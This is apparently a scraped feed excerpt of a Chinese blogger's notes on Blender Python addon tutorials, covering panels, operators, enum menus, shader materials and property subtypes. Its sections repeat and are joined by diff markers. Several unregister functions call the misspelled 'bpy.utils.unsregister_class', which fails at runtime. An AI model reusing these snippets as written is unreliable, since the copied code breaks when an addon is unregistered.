    bl_idname = 'ADDONNAME_PT_TemplatePanel'
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'Template Tab'

    def draw(self, context):
    layout = self.layout

    layout.operator('wm.template_operator')


    class ADDONANE_OT_TemplateOperator(bpy.types.Operator):
    bl_label = 'Template Operator'
    bl_idname = 'wm.template_operator'

    preset_enum: bpy.props.EnumProperty(
    name='',
    description='Select an option',
    items=[
    ('OP1', 'Cube', 'Add a Cube to the scene'),
    ('OP2', 'Sphere', ''),
    ('OP3', 'Suzanne', 'Add Suzanne to the scene')
    ]
    )


    def invoke(self, context, event):
    wm = context.window_manager
    return wm.invoke_props_dialog(self)


    def draw(self, context):
    layout = self.layout
    layout.prop(self, 'preset_enum')


    def execute(self, context):
    if self.preset_enum == 'OP1':
    bpy.ops.mesh.primitive_cube_add()
    if self.preset_enum == 'OP2':
    bpy.ops.mesh.primitive_uv_sphere_add()
    if self.preset_enum == 'OP3':
    bpy.ops.mesh.primitive_monkey_add()
    return {'FINISHED'}


    def register():
    bpy.utils.register_class(ADDONNAME_PT_TemplatePanel)
    bpy.utils.register_class(ADDONANE_OT_TemplateOperator)


    def unregister():
    bpy.utils.unsregister_class(ADDONNAME_PT_TemplatePanel)
    bpy.utils.unregister_class(ADDONANE_OT_TemplateOperator)


    if __name__ == '__main__':
    register()

    运行代码,enum 会创建一个下拉菜单:

    jpg

    Class Naming Convention

    介绍了 Blender 命名传统规则:Darkfall : Blender Python Tutorial: Class Naming Convention (darkfallblender.blogspot.com)

    How to create and assign a Material Shader

    这段代码实现了一个简单的 Blender 插件,在 3D 视图空间中添加了一个面板和一个操作。具体解释如下:

    1. import bpy 导入了 Blender 的 Python API。
    2. ADDONNAME_PT_main_panel(bpy.types.Panel) 定义了一个继承自 bpy.types.Panel 的面板类,并将其命名为 ADDONNAME_PT_main_panel。在类的内部,定义了面板的相关属性和 draw() 方法。
    3. bl_label 中指定了面板标签文本,bl_idname 中指定了面板的 ID。bl_space_type 指定了面板支持的空间类型,这里使用 'VIEW_3D' 表示只会在 3D 视图空间中显示。bl_region_type 指定了面板所占的区域类型,这里使用 'UI' 表示在 UI 区域中显示。bl_category 指定了面板所属的类别,这里使用 'New Tab' 表示添加到一个名为 'New Tab' 的新标签页中。
    4. draw() 方法中,通过 self.layout.operator() 添加了一个操作按钮,用于执行 ADDONNAME_OT_add_basic 操作。
    5. ADDONNAME_OT_add_basic(bpy.types.Operator) 类定义了一个继承自 bpy.types.Operator 的操作类,并将其命名为 ADDONNAME_OT_add_basic。其中,bl_label 指定了操作在 UI 中的显示名称,bl_idname 指定了操作的 ID。
    6. 在类中定义了一个名为 col 的属性,类型为 bpy.props.FloatVectorProperty。这个属性是一个四元组,表示 RGBA 颜色值。
    7. execute() 方法中实现了插件的核心逻辑,用于创建一个新的材质,并将其应用到当前选择的对象上。具体来说,这个方法中首先创建了一个名为 material_basic 的新材质,并设置其使用节点。然后通过 material_basic.node_tree.nodes.get('Principled BSDF') 获取材质的 Principled BSDF 节点,并将其 metallic 参数设置为 0.08。接着,创建了一个 ShaderNodeRGB 节点,并将其颜色值设置为 self.col 中存储的颜色值。最后,通过 material_basic.node_tree.links.new() 创建了两个节点之间的连接,并将材质应用到当前选择的对象上。
    8. invoke() 方法用于在用户执行操作时打开一个小型对话框,以便用户在对话框中设置属性值。返回值表示执行结果。
    9. classes = [ADDONNAME_PT_main_panel, ADDONNAME_OT_add_basic] 定义了一个列表,其中包含了需要进行注册的所有类。
    10. register() 函数中,使用 bpy.utils.register_class() 分别注册了 classes 列表中的每一个类。
    11. unregister() 函数中,使用 bpy.utils.unregister_class() 分别注销了 classes 列表中的每一个类。
    12. if __name__ == "__main__": register() 是一个常用的语法,表示在插件文件被直接运行时自动执行注册函数进行注册。

    原网址 Darkfall : Blender Python Tutorial: How to Create and Assign a Shader Material (darkfallblender.blogspot.com) 下的代码太旧了,要把 col = bpy.props.FloatVectorProperty(name= "Color", subtype= 'COLOR_GAMMA', size=4, default=(0.0, 1.0, 0.0, 1.0)) 改成 col: bpy.props.FloatVectorProperty(name= "Color", subtype= 'COLOR_GAMMA', size=4, default=(0.0, 1.0, 0.0, 1.0)) 才能跑,这是我第二次进坑了 orz

    import bpy


    class ADDONNAME_PT_main_panel(bpy.types.Panel):

    bl_label = "Add Shader Panel"
    bl_idname = "ADDONNAME_PT_main_panel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'New Tab'

    def draw(self, context):
    layout = self.layout
    layout.operator("addonname.addbasic_operator")


    class ADDONNAME_OT_add_basic(bpy.types.Operator):
    bl_label = "Add Basic Shader"
    bl_idname = "addonname.addbasic_operator"

    col: bpy.props.FloatVectorProperty(name= "Color", subtype= 'COLOR_GAMMA', size=4, default=(0.0, 1.0, 0.0, 1.0))


    def execute(self, context):
    material_basic = bpy.data.materials.new(name= "Basic")
    material_basic.use_nodes = True

    principled_node = material_basic.node_tree.nodes.get('Principled BSDF')
    principled_node.inputs[7].default_value = 0.08

    rgb_node = material_basic.node_tree.nodes.new('ShaderNodeRGB')
    rgb_node.location = (-250, 0)
    rgb_node.outputs[0].default_value = self.col

    link = material_basic.node_tree.links.new
    link(rgb_node.outputs[0], principled_node.inputs[0])

    bpy.context.object.active_material = material_basic

    return {'FINISHED'}

    def invoke(self, context, event):
    return context.window_manager.invoke_props_dialog(self)


    classes = [ADDONNAME_PT_main_panel, ADDONNAME_OT_add_basic]


    def register():
    for cls in classes:
    bpy.utils.register_class(cls)

    def unregister():
    for cls in classes:
    bpy.utils.unregister_class(cls)


    if __name__ == "__main__":
    register()

    开跑!

    jpg

    Create Property Group & Enumerator (Panel)

    这段代码是一个 Blender 插件的示例,用来创建一个面板和操作符,实现一些简单的功能。

    首先,定义了一个 MyProperties 类,继承自 bpy.types.PropertyGroup。它定义了三个属性:my_string 属性为字符串类型,显示为一个文本框;my_float_vector 为浮点向量类型,显示为三个滑块;my_enum 为枚举类型,显示为一个下拉菜单,其中包含三个不同的操作选项。

    然后,定义了一个 ADDONNAME_PT_main_panel 类,继承自 bpy.types.Panel。它定义了一个面板,包含上述三个属性的控件,并在最后添加了一个名为 addonname.myop_operator 的操作符按钮。

    接下来,定义了一个 ADDONNAME_OT_my_op 类,继承自 bpy.types.Operator,用来处理该操作符按钮的执行操作。execute() 方法中根据当前选择的操作选项,使用 Blender 提供的函数进行不同的操作。例如,如果选择了“Add Cube”选项,则使用 bpy.ops.mesh.primitive_cube_add() 函数创建一个立方体,并将其命名为 mytool.my_string;同时,根据 mytool.my_float_vector 中的值对其进行缩放。最后,返回一个 {'FINISHED'} 字典表示操作已完成。

    最后,定义了 classes 列表包含上述三个类,以及注册和注销插件的函数 register()unregister(),在注册时将 MyProperties 类的实例指针赋值给 bpy.types.Scene.my_tool 属性。当运行该脚本时,将自动注册插件。

    总体来说,这段代码是一个简单的 Blender 插件示例,展示了如何创建自定义属性和操作符,并将它们添加到面板中以实现简单的交互式操作。

    import bpy


    class MyProperties(bpy.types.PropertyGroup):
    my_string: bpy.props.StringProperty(name='Enter Text')
    my_float_vector: bpy.props.FloatVectorProperty(name='Enter Value', soft_min=0, soft_max=1000, default=(1, 1, 1))
    my_enum: bpy.props.EnumProperty(
    name='Enumerator / Dropdown',
    description='sample text',
    items=[('OP1', 'Add Cube', ''),
    ('OP2', 'Add Sphere', ''),
    ('OP3', 'Add Suzanne', '')
    ]
    )


    class ADDONNAME_PT_main_panel(bpy.types.Panel):
    bl_label = "Main Panel"
    bl_idname = "ADDONNAME_PT_main_panel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "New Tab"

    def draw(self, context):
    layout = self.layout
    scene = context.scene
    mytool = scene.my_tool

    layout.prop(mytool, 'my_string')
    layout.prop(mytool, 'my_float_vector')
    layout.prop(mytool, 'my_enum')

    row = layout.row()
    row.operator("addonname.myop_operator")


    class ADDONNAME_OT_my_op(bpy.types.Operator):
    bl_label = "Operator"
    bl_idname = "addonname.myop_operator"


    def execute(self, context):
    scene = context.scene
    mytool = scene.my_tool

    if mytool.my_enum == 'OP1':
    bpy.ops.mesh.primitive_cube_add()
    bpy.context.object.name = mytool.my_string
    bpy.context.object.scale[0] = mytool.my_float_vector[0]
    bpy.context.object.scale[1] = mytool.my_float_vector[1]
    bpy.context.object.scale[2] = mytool.my_float_vector[2]
    if mytool.my_enum == 'OP2':
    bpy.ops.mesh.primitive_uv_sphere_add()
    bpy.context.object.name = mytool.my_string
    bpy.context.object.scale[0] = mytool.my_float_vector[0]
    bpy.context.object.scale[1] = mytool.my_float_vector[1]
    bpy.context.object.scale[2] = mytool.my_float_vector[2]
    if mytool.my_enum == 'OP3':
    bpy.ops.mesh.primitive_monkey_add()
    bpy.context.object.name = mytool.my_string
    bpy.context.object.scale[0] = mytool.my_float_vector[0]
    bpy.context.object.scale[1] = mytool.my_float_vector[1]
    bpy.context.object.scale[2] = mytool.my_float_vector[2]
    return {'FINISHED'}


    classes = [MyProperties, ADDONNAME_PT_main_panel, ADDONNAME_OT_my_op]


    def register():
    for cls in classes:
    bpy.utils.register_class(cls)
    bpy.types.Scene.my_tool = bpy.props.PointerProperty(type=MyProperties)

    def unregister():
    for cls in classes:
    bpy.utils.unregister_class(cls)
    del bpy.types.Scene.my_tool


    if __name__ == "__main__":
    register()

    创建了一个可以创建模型并设置相关参数的插件:

    jpg

    Property Subtypes and Password Protection

    主要介绍了StringPropertyFloatVectorProperty中的 subtype 属性:

    在 Blender Python API 中,StringPropertyFloatVectorProperty 中的 subtype 属性都有以下选项:

    对于 StringProperty

    • FILE_PATH: 文件路径类型。
    • DIR_PATH: 目录路径类型。
    • FILE_NAME: 文件名类型。
    • PASSWORD: 密码类型。
    • NONE: 普通文本类型。

    对于 FloatVectorProperty

    • COLOR: 表示颜色值(RGB)类型。
    • TRANSLATION: 表示平移向量类型。
    • DIRECTION: 表示方向向量类型。
    • VELOCITY: 表示速率/速度向量类型。
    • ACCELERATION: 表示加速度向量类型。
    • NONE: 普通浮点数类型。

    使用这些不同的 subtype 值,可以在 Blender 中创建不同类型的属性,以便更好地适应特定的场景和需求。例如,使用 FILE_PATHDIR_PATH 可以创建一个文件选择器或目录选择器,方便用户选择相应的文件或目录;使用 COLOR 可以创建一种颜色选择器,方便用户选择 RGB 值。

    一个密码的使用案例:

    import bpy


    class MyProperties(bpy.types.PropertyGroup):
    my_string : bpy.props.StringProperty(name= "Password", subtype= 'PASSWORD')


    class ADDONNAME_PT_main_panel(bpy.types.Panel):
    bl_label = "Main Panel"
    bl_idname = "ADDONNAME_PT_main_panel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "New Tab"

    def draw(self, context):
    layout = self.layout
    scene = context.scene
    mytool = scene.my_tool

    row = layout.row()
    split = row.split(factor= 0.5)

    row.prop(mytool, "my_string")

    layout.operator("addonname.myop_operator")


    class ADDONNAME_OT_my_op(bpy.types.Operator):
    bl_label = "Confirm"
    bl_idname = "addonname.myop_operator"

    def execute(self, context):
    scene = context.scene
    mytool = scene.my_tool

    if mytool.my_string == "awesomepassword":
    bpy.ops.mesh.primitive_cube_add()
    return {'FINISHED'}


    classes = [MyProperties, ADDONNAME_PT_main_panel, ADDONNAME_OT_my_op]


    def register():
    for cls in classes:
    bpy.utils.register_class(cls)

    bpy.types.Scene.my_tool = bpy.props.PointerProperty(type= MyProperties)


    def unregister():
    for cls in classes:
    bpy.utils.unregister_class(cls)
    del bpy.types.Scene.my_tool


    if __name__ == "__main__":
    register()

    png

    Blender 2.90 is here! - Scripting Changes!!?

    介绍了 2.9 版本的特性……emmm 我都用上 3.5.1 了

    Read an Error Message and how to Fix it [learn python for beginners]

    教你怎么看错误提示并根据此进行代码调试。

    Importing Modules

    教你怎么用 from ... import 语句。

    ]]>
    + 课程

    Updated Registration Method

    emmmm 就是把 register() 里注册的类放到一个 for 循环里:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    def register():
    bpy.utils.register_class(NODE_OT_compGroup)
    bpy.utils.register_class(NODE_PT_customPanel)


    def unregister():
    bpy.utils.unregister_class(NODE_OT_compGroup)
    bpy.utils.unregister_class(NODE_PT_customPanel)


    if __name__ == "__main__":
    register()

    改为:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    classes = [NODE_OT_compGroup, NODE_PT_customPanel, YOUR_CLASS_NAME]

    def register():
    for cls in classes:
    bpy.utils.register_class(cls)


    def unregister():
    for cls in classes:
    bpy.utils.unregister_class(cls)


    if __name__ == "__main__":
    register()

    5 Scripting Tips for Beginners

    介绍了一些小技巧:

    在 python console 里,输入代码:

    列出场景中已有的 3D 物体:

    1
    list(bpy.data.objects)

    列出场景中已有的材质:

    1
    list(bpy.data.materials)

    新建一个材质:

    1
    bpy.data.materials.new("My Material")

    Text Editor 中,Text-Live Edit 可以实时运行脚本。

    jpg

    Enumerator / Drop down Menu

    这段代码定义了两个类和两个函数,用于在 Blender 中添加一个面板和一个操作员。

    1. ADDONNAME_PT_TemplatePanel 类 该类继承自 bpy.types.Panel,它创建了一个面板并定义了它的一些属性。bl_label 属性定义了面板的名称,bl_idname 属性是面板的唯一标识符,bl_space_type 和 bl_region_type 属性定义了面板在哪个空间和区域中显示,bl_category 属性定义了面板应该显示在哪个选项卡中。draw() 方法定义了面板的布局和内容,layout 变量用来管理面板的布局和元素,layout.operator() 方法添加了一个操作按钮,该按钮调用名为 “wm.template_operator” 的操作员。
    2. ADDONANE_OT_TemplateOperator 类 该类继承自 bpy.types.Operator,它创建了一个操作员,并定义了它的一些属性。bl_label 属性创建了操作员的按钮标签,bl_idname 属性是操作员的唯一标识符。preset_enum 属性是一个枚举值,它提供了三个不同的选项,每个选项都有一个唯一的 id、一个名称和一个描述。invoke() 方法定义了当用户单击操作员时执行的代码,draw() 方法定义了操作员的布局和内容,execute() 方法定义了操作员执行的代码。
    3. register() 函数 该函数使用 bpy.utils.register_class() 方法注册 ADDONNAME_PT_TemplatePanel 和 ADDONANE_OT_TemplateOperator 两个类,将它们添加到 Blender 中。
    4. unregister() 函数 该函数使用 bpy.utils.unregister_class() 方法取消注册 ADDONNAME_PT_TemplatePanel 和 ADDONANE_OT_TemplateOperator 两个类,将它们从 Blender 中移除。

    最后,如果该脚本被直接运行(而不是被其他脚本导入),则调用 register() 函数将 ADDONNAME_PT_TemplatePanel 和 ADDONANE_OT_TemplateOperator 两个类添加到 Blender 中。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    import bpy


    class ADDONNAME_PT_TemplatePanel(bpy.types.Panel):
    bl_label = 'Name of the Panel'
    bl_idname = 'ADDONNAME_PT_TemplatePanel'
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'Template Tab'

    def draw(self, context):
    layout = self.layout

    layout.operator('wm.template_operator')


    class ADDONANE_OT_TemplateOperator(bpy.types.Operator):
    bl_label = 'Template Operator'
    bl_idname = 'wm.template_operator'

    preset_enum: bpy.props.EnumProperty(
    name='',
    description='Select an option',
    items=[
    ('OP1', 'Cube', 'Add a Cube to the scene'),
    ('OP2', 'Sphere', ''),
    ('OP3', 'Suzanne', 'Add Suzanne to the scene')
    ]
    )


    def invoke(self, context, event):
    wm = context.window_manager
    return wm.invoke_props_dialog(self)


    def draw(self, context):
    layout = self.layout
    layout.prop(self, 'preset_enum')


    def execute(self, context):
    if self.preset_enum == 'OP1':
    bpy.ops.mesh.primitive_cube_add()
    if self.preset_enum == 'OP2':
    bpy.ops.mesh.primitive_uv_sphere_add()
    if self.preset_enum == 'OP3':
    bpy.ops.mesh.primitive_monkey_add()
    return {'FINISHED'}


    def register():
    bpy.utils.register_class(ADDONNAME_PT_TemplatePanel)
    bpy.utils.register_class(ADDONANE_OT_TemplateOperator)


    def unregister():
    bpy.utils.unsregister_class(ADDONNAME_PT_TemplatePanel)
    bpy.utils.unregister_class(ADDONANE_OT_TemplateOperator)


    if __name__ == '__main__':
    register()

    运行代码,enum 会创建一个下拉菜单:

    jpg

    Class Naming Convention

    介绍了 Blender 命名传统规则:Darkfall : Blender Python Tutorial: Class Naming Convention (darkfallblender.blogspot.com)

    How to create and assign a Material Shader

    这段代码实现了一个简单的 Blender 插件,在 3D 视图空间中添加了一个面板和一个操作。具体解释如下:

    1. import bpy 导入了 Blender 的 Python API。
    2. ADDONNAME_PT_main_panel(bpy.types.Panel) 定义了一个继承自 bpy.types.Panel 的面板类,并将其命名为 ADDONNAME_PT_main_panel。在类的内部,定义了面板的相关属性和 draw() 方法。
    3. bl_label 中指定了面板标签文本,bl_idname 中指定了面板的 ID。bl_space_type 指定了面板支持的空间类型,这里使用 'VIEW_3D' 表示只会在 3D 视图空间中显示。bl_region_type 指定了面板所占的区域类型,这里使用 'UI' 表示在 UI 区域中显示。bl_category 指定了面板所属的类别,这里使用 'New Tab' 表示添加到一个名为 'New Tab' 的新标签页中。
    4. draw() 方法中,通过 self.layout.operator() 添加了一个操作按钮,用于执行 ADDONNAME_OT_add_basic 操作。
    5. ADDONNAME_OT_add_basic(bpy.types.Operator) 类定义了一个继承自 bpy.types.Operator 的操作类,并将其命名为 ADDONNAME_OT_add_basic。其中,bl_label 指定了操作在 UI 中的显示名称,bl_idname 指定了操作的 ID。
    6. 在类中定义了一个名为 col 的属性,类型为 bpy.props.FloatVectorProperty。这个属性是一个四元组,表示 RGBA 颜色值。
    7. execute() 方法中实现了插件的核心逻辑,用于创建一个新的材质,并将其应用到当前选择的对象上。具体来说,这个方法中首先创建了一个名为 material_basic 的新材质,并设置其使用节点。然后通过 material_basic.node_tree.nodes.get('Principled BSDF') 获取材质的 Principled BSDF 节点,并将其 metallic 参数设置为 0.08。接着,创建了一个 ShaderNodeRGB 节点,并将其颜色值设置为 self.col 中存储的颜色值。最后,通过 material_basic.node_tree.links.new() 创建了两个节点之间的连接,并将材质应用到当前选择的对象上。
    8. invoke() 方法用于在用户执行操作时打开一个小型对话框,以便用户在对话框中设置属性值。返回值表示执行结果。
    9. classes = [ADDONNAME_PT_main_panel, ADDONNAME_OT_add_basic] 定义了一个列表,其中包含了需要进行注册的所有类。
    10. register() 函数中,使用 bpy.utils.register_class() 分别注册了 classes 列表中的每一个类。
    11. unregister() 函数中,使用 bpy.utils.unregister_class() 分别注销了 classes 列表中的每一个类。
    12. if __name__ == "__main__": register() 是一个常用的语法,表示在插件文件被直接运行时自动执行注册函数进行注册。

    原网址 Darkfall : Blender Python Tutorial: How to Create and Assign a Shader Material (darkfallblender.blogspot.com) 下的代码太旧了,要把 col = bpy.props.FloatVectorProperty(name= "Color", subtype= 'COLOR_GAMMA', size=4, default=(0.0, 1.0, 0.0, 1.0)) 改成 col: bpy.props.FloatVectorProperty(name= "Color", subtype= 'COLOR_GAMMA', size=4, default=(0.0, 1.0, 0.0, 1.0)) 才能跑,这是我第二次进坑了 orz

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    import bpy


    class ADDONNAME_PT_main_panel(bpy.types.Panel):

    bl_label = "Add Shader Panel"
    bl_idname = "ADDONNAME_PT_main_panel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'New Tab'

    def draw(self, context):
    layout = self.layout
    layout.operator("addonname.addbasic_operator")


    class ADDONNAME_OT_add_basic(bpy.types.Operator):
    bl_label = "Add Basic Shader"
    bl_idname = "addonname.addbasic_operator"

    col: bpy.props.FloatVectorProperty(name= "Color", subtype= 'COLOR_GAMMA', size=4, default=(0.0, 1.0, 0.0, 1.0))


    def execute(self, context):
    material_basic = bpy.data.materials.new(name= "Basic")
    material_basic.use_nodes = True

    principled_node = material_basic.node_tree.nodes.get('Principled BSDF')
    principled_node.inputs[7].default_value = 0.08

    rgb_node = material_basic.node_tree.nodes.new('ShaderNodeRGB')
    rgb_node.location = (-250, 0)
    rgb_node.outputs[0].default_value = self.col

    link = material_basic.node_tree.links.new
    link(rgb_node.outputs[0], principled_node.inputs[0])

    bpy.context.object.active_material = material_basic

    return {'FINISHED'}

    def invoke(self, context, event):
    return context.window_manager.invoke_props_dialog(self)


    classes = [ADDONNAME_PT_main_panel, ADDONNAME_OT_add_basic]


    def register():
    for cls in classes:
    bpy.utils.register_class(cls)

    def unregister():
    for cls in classes:
    bpy.utils.unregister_class(cls)


    if __name__ == "__main__":
    register()

    开跑!

    jpg

    Create Property Group & Enumerator (Panel)

    这段代码是一个 Blender 插件的示例,用来创建一个面板和操作符,实现一些简单的功能。

    首先,定义了一个 MyProperties 类,继承自 bpy.types.PropertyGroup。它定义了三个属性:my_string 属性为字符串类型,显示为一个文本框;my_float_vector 为浮点向量类型,显示为三个滑块;my_enum 为枚举类型,显示为一个下拉菜单,其中包含三个不同的操作选项。

    然后,定义了一个 ADDONNAME_PT_main_panel 类,继承自 bpy.types.Panel。它定义了一个面板,包含上述三个属性的控件,并在最后添加了一个名为 addonname.myop_operator 的操作符按钮。

    接下来,定义了一个 ADDONNAME_OT_my_op 类,继承自 bpy.types.Operator,用来处理该操作符按钮的执行操作。execute() 方法中根据当前选择的操作选项,使用 Blender 提供的函数进行不同的操作。例如,如果选择了“Add Cube”选项,则使用 bpy.ops.mesh.primitive_cube_add() 函数创建一个立方体,并将其命名为 mytool.my_string;同时,根据 mytool.my_float_vector 中的值对其进行缩放。最后,返回一个 {'FINISHED'} 字典表示操作已完成。

    最后,定义了 classes 列表包含上述三个类,以及注册和注销插件的函数 register()unregister(),在注册时将 MyProperties 类的实例指针赋值给 bpy.types.Scene.my_tool 属性。当运行该脚本时,将自动注册插件。

    总体来说,这段代码是一个简单的 Blender 插件示例,展示了如何创建自定义属性和操作符,并将它们添加到面板中以实现简单的交互式操作。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    import bpy


    class MyProperties(bpy.types.PropertyGroup):
    my_string: bpy.props.StringProperty(name='Enter Text')
    my_float_vector: bpy.props.FloatVectorProperty(name='Enter Value', soft_min=0, soft_max=1000, default=(1, 1, 1))
    my_enum: bpy.props.EnumProperty(
    name='Enumerator / Dropdown',
    description='sample text',
    items=[('OP1', 'Add Cube', ''),
    ('OP2', 'Add Sphere', ''),
    ('OP3', 'Add Suzanne', '')
    ]
    )


    class ADDONNAME_PT_main_panel(bpy.types.Panel):
    bl_label = "Main Panel"
    bl_idname = "ADDONNAME_PT_main_panel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "New Tab"

    def draw(self, context):
    layout = self.layout
    scene = context.scene
    mytool = scene.my_tool

    layout.prop(mytool, 'my_string')
    layout.prop(mytool, 'my_float_vector')
    layout.prop(mytool, 'my_enum')

    row = layout.row()
    row.operator("addonname.myop_operator")


    class ADDONNAME_OT_my_op(bpy.types.Operator):
    bl_label = "Operator"
    bl_idname = "addonname.myop_operator"


    def execute(self, context):
    scene = context.scene
    mytool = scene.my_tool

    if mytool.my_enum == 'OP1':
    bpy.ops.mesh.primitive_cube_add()
    bpy.context.object.name = mytool.my_string
    bpy.context.object.scale[0] = mytool.my_float_vector[0]
    bpy.context.object.scale[1] = mytool.my_float_vector[1]
    bpy.context.object.scale[2] = mytool.my_float_vector[2]
    if mytool.my_enum == 'OP2':
    bpy.ops.mesh.primitive_uv_sphere_add()
    bpy.context.object.name = mytool.my_string
    bpy.context.object.scale[0] = mytool.my_float_vector[0]
    bpy.context.object.scale[1] = mytool.my_float_vector[1]
    bpy.context.object.scale[2] = mytool.my_float_vector[2]
    if mytool.my_enum == 'OP3':
    bpy.ops.mesh.primitive_monkey_add()
    bpy.context.object.name = mytool.my_string
    bpy.context.object.scale[0] = mytool.my_float_vector[0]
    bpy.context.object.scale[1] = mytool.my_float_vector[1]
    bpy.context.object.scale[2] = mytool.my_float_vector[2]
    return {'FINISHED'}


    classes = [MyProperties, ADDONNAME_PT_main_panel, ADDONNAME_OT_my_op]


    def register():
    for cls in classes:
    bpy.utils.register_class(cls)
    bpy.types.Scene.my_tool = bpy.props.PointerProperty(type=MyProperties)

    def unregister():
    for cls in classes:
    bpy.utils.unregister_class(cls)
    del bpy.types.Scene.my_tool


    if __name__ == "__main__":
    register()

    创建了一个可以创建模型并设置相关参数的插件:

    jpg

    Property Subtypes and Password Protection

    主要介绍了StringPropertyFloatVectorProperty中的 subtype 属性:

    在 Blender Python API 中,StringPropertyFloatVectorProperty 中的 subtype 属性都有以下选项:

    对于 StringProperty

    • FILE_PATH: 文件路径类型。
    • DIR_PATH: 目录路径类型。
    • FILE_NAME: 文件名类型。
    • PASSWORD: 密码类型。
    • NONE: 普通文本类型。

    对于 FloatVectorProperty

    • COLOR: 表示颜色值(RGB)类型。
    • TRANSLATION: 表示平移向量类型。
    • DIRECTION: 表示方向向量类型。
    • VELOCITY: 表示速率/速度向量类型。
    • ACCELERATION: 表示加速度向量类型。
    • NONE: 普通浮点数类型。

    使用这些不同的 subtype 值,可以在 Blender 中创建不同类型的属性,以便更好地适应特定的场景和需求。例如,使用 FILE_PATHDIR_PATH 可以创建一个文件选择器或目录选择器,方便用户选择相应的文件或目录;使用 COLOR 可以创建一种颜色选择器,方便用户选择 RGB 值。

    一个密码的使用案例:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    import bpy


    class MyProperties(bpy.types.PropertyGroup):
    my_string : bpy.props.StringProperty(name= "Password", subtype= 'PASSWORD')


    class ADDONNAME_PT_main_panel(bpy.types.Panel):
    bl_label = "Main Panel"
    bl_idname = "ADDONNAME_PT_main_panel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "New Tab"

    def draw(self, context):
    layout = self.layout
    scene = context.scene
    mytool = scene.my_tool

    row = layout.row()
    split = row.split(factor= 0.5)

    row.prop(mytool, "my_string")

    layout.operator("addonname.myop_operator")


    class ADDONNAME_OT_my_op(bpy.types.Operator):
    bl_label = "Confirm"
    bl_idname = "addonname.myop_operator"

    def execute(self, context):
    scene = context.scene
    mytool = scene.my_tool

    if mytool.my_string == "awesomepassword":
    bpy.ops.mesh.primitive_cube_add()
    return {'FINISHED'}


    classes = [MyProperties, ADDONNAME_PT_main_panel, ADDONNAME_OT_my_op]


    def register():
    for cls in classes:
    bpy.utils.register_class(cls)

    bpy.types.Scene.my_tool = bpy.props.PointerProperty(type= MyProperties)


    def unregister():
    for cls in classes:
    bpy.utils.unregister_class(cls)
    del bpy.types.Scene.my_tool


    if __name__ == "__main__":
    register()

    png

    Blender 2.90 is here! - Scripting Changes!!?

    介绍了 2.9 版本的特性……emmm 我都用上 3.5.1 了

    Read an Error Message and how to Fix it [learn python for beginners]

    教你怎么看错误提示并根据此进行代码调试。

    Importing Modules

    教你怎么用 from ... import 语句。

    ]]>
    @@ -6404,7 +6404,7 @@ /posts/Software-Blender%20&%20Python%20(1-10)/ - 资源

    课程

    An Introduction to Scripting

    将视图改成如下图所示,拖动视图的右上角可以分离视图:

    jpg

    编写 python 代码:

    import bpy

    class TestPanel(bpy.types.Panel):
    bl_label = "Test Panel"
    bl_idname = "PT_TestPanel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = 'My 1st Addona'

    def draw(self, context):
    layout = self.layout

    row = layout.row()
    row.label(text='Add an object', icon='CUBE')
    row = layout.row()
    row.operator('mesh.primitive_cube_add', icon='CUBE')
    row.operator('mesh.primitive_uv_sphere_add', icon='SPHERE')
    row = layout.row()
    row.operator('object.text_add', icon='FILE_FONT')


    def register():
    bpy.utils.register_class(TestPanel)

    def unregister():
    bpy.utils.unsregister_class(TestPanel)


    if __name__ == '__main__':
    register()

    这段 python 代码是在 Blender 中添加一个面板(Panel),面板的名称为“Test Panel”,在 3D 视窗中显示,属于 UI 面板类型,属于"My 1st Addona"类别。这个面板里面添加了三个按钮,分别为添加一个立方体、添加一个球体、添加一个文字。

    具体解释如下:

    • 第一行导入了 blender 的 Python API,可以让我们在 Python 中使用 Blender 的功能。
    • 接下来定义了一个名为 TestPanel 的类,该类继承自 bpy.types.Panel,用于创建面板。bl_label 表示显示的名称,bl_idname 是给面板加上一个独有的 ID,可以在其他地方调用它,bl_space_type 表示要显示在哪种编辑器空间中,这里是VIEW_3D 3D 视窗中显示,bl_region_type 表示要显示在哪个区域内,这里是’UI’ 用户界面标签页。bl_category 表示在哪个类别下进行分组,这里将其放在“My 1st Addona”。
